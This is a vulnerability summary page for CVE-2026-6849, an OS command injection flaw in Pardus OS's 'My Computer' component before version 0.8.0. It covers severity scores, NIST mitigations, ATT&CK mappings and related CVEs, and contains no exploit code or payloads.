Cyber Posture

CVE-2026-6849

HighRCE

Published: 29 April 2026

Published
29 April 2026
Modified
29 April 2026
KEV Added
Patch
CVSS Score 8.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score 0.0012 30.5th percentile
Risk Priority 18 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-6849 is a high-severity OS Command Injection (CWE-78) vulnerability in Gov (inferred from references). Its CVSS base score is 8.8 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Client Execution (T1203); ranked at the 30.5th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploitation for Client Execution (T1203) and 1 other technique. What defenders deploy: see the NIST 800-53 controls recommended below.
Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-10 Information Input Validation good match
prevent

Directly addresses the improper neutralization of special elements in OS commands by requiring validation of inputs to prevent command injection.

SI-2 Flaw Remediation good match
prevent

Mitigates the vulnerability by identifying, reporting, and correcting the specific flaw through patching to Pardus OS My Computer version 0.8.0 or later.

SI-4 System Monitoring partial match
detect

Enables monitoring of the system to detect unauthorized OS command execution resulting from successful injection attempts.

MITRE ATT&CK Enterprise TechniquesAI

T1203 Exploitation for Client Execution Execution
Adversaries may exploit software vulnerabilities in client applications to execute code.
attack.mitre.org →
T1059.004 Unix Shell Execution
Adversaries may abuse Unix shell commands and scripts for execution.
attack.mitre.org →
Why these techniques?

CVE enables OS command injection in a client application (My Computer in Pardus OS), facilitating exploitation for client execution (T1203) and arbitrary Unix shell command execution (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

NVD Description

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection. This issue affects Pardus OS My Computer: from <=0.7.5 before 0.8.0.

Deeper analysisAI

CVE-2026-6849 is an improper neutralization of special elements used in an OS command, enabling OS command injection (CWE-78), in the My Computer component of Pardus OS from TUBITAK BILGEM Software Technologies Research Institute. This vulnerability affects Pardus OS My Computer versions up to and including 0.7.5, prior to version 0.8.0. It was published on 2026-04-29 with a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

Remote attackers can exploit this vulnerability over the network with low attack complexity and no required privileges, though user interaction is necessary. Successful exploitation grants attackers the ability to inject and execute arbitrary OS commands with high impacts on confidentiality, integrity, and availability.

The USOM advisory at https://www.usom.gov.tr/bildirim/tr-26-0131 provides further details, with mitigation achieved by upgrading Pardus OS My Computer to version 0.8.0 or later.

Details

CWE(s)
CWE-78

Affected Products

Gov
inferred from references and description; NVD did not file a CPE for this CVE

CVEs Like This One

CVE-2026-24844Shared CWE-78
CVE-2026-40032Shared CWE-78
CVE-2026-39862Shared CWE-78
CVE-2026-33412Shared CWE-78
CVE-2026-40030Shared CWE-78
CVE-2026-41015Shared CWE-78
CVE-2026-5485Shared CWE-78
CVE-2025-1244Shared CWE-78
CVE-2026-34714Shared CWE-78
CVE-2026-33874Shared CWE-78

References